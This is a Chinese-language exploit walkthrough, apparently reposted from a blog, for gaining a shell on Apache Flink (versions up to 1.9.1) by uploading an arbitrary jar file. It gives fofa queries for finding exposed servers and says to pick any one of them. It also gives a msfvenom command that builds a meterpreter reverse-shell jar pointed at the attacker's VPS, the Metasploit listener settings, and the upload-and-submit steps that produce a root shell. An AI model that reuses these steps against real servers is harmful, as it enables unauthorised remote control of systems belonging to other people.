Apache Flink 任意jar文件上傳+執行


01 描述

通過部署任意jar包的功能可直接向服務器添加jar木馬文件

02 影響范圍

<= 1.9.1

03 fofa語法

app="Apache-Flink"
app="Apache‐Flink" && country="CN"

04 漏洞復現

1.fofa搜索關鍵字,隨便找一個點進去,選擇最下方的Submit New Job

2.使用msf生成jar格式木馬,LHOST為公網VPS地址

msfvenom ‐p java/meterpreter/reverse_tcp LHOST=**.***.***.**  LPORT=44445 ‐f jar > 44445.jar

3. 公網開啟msf監聽
啟動msf框架

msfconsole


選擇handler模塊

use exploit/multi/handler 


設置監聽的ip和端口(和生成的木馬相對應) (代碼中0.0.0.0表示監聽所有流向44445端口的流量) *注意payload不要選錯哦

set lhost 0.0.0.0
set lport 44445
set payload java/meterpreter/reverse_tcp


run或exploit開啟監聽

到此為止關於公網vps監聽就已經設置好了,等待上傳shell jar文件的連接就好了
4.在apache flink中選擇Add New,選擇木馬jar文件上傳

5.點擊剛剛上傳的木馬文件

6.選擇submit

7.這時候在返回公網vps發現已經接收到了反彈的meterpreter shell了,getuid查看權限為root權限

友情提示,小伙伴們復現完之后記得清理一下文件哦


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM